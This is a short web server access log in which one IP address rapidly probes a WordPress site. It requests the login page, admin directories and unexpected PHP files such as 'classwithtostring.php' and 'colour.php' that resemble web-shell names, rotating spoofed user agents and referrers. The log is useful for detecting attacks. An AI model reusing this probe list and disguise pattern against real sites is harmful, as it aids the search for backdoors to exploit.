4.205.225.47 - - [28/Nov/2025:23:58:04 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:04 +0800] "GET /wp-admin/classwithtostring.php HTTP/1.1" 404 27 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:05 +0800] "GET /wp-admin/css/ HTTP/1.1" 403 146 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
4.205.225.47 - - [28/Nov/2025:23:58:05 +0800] "GET /wp-admin/css/colors/ HTTP/1.1" 403 548 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:05 +0800] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 548 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:06 +0800] "GET /wp-admin/css/colors/light/function.php HTTP/1.1" 404 27 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
4.205.225.47 - - [28/Nov/2025:23:58:06 +0800] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 548 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:07 +0800] "GET /wp-admin/images/ HTTP/1.1" 403 548 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
4.205.225.47 - - [28/Nov/2025:23:58:07 +0800] "GET /wp-admin/includes/ HTTP/1.1" 403 146 "https://www.google.fr/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
4.205.225.47 - - [28/Nov/2025:23:58:07 +0800] "GET /wp-admin/includes/about.php HTTP/1.1" 404 27 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
4.205.225.47 - - [28/Nov/2025:23:58:08 +0800] "GET /wp-admin/includes/colour.php HTTP/1.1" 404 27 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
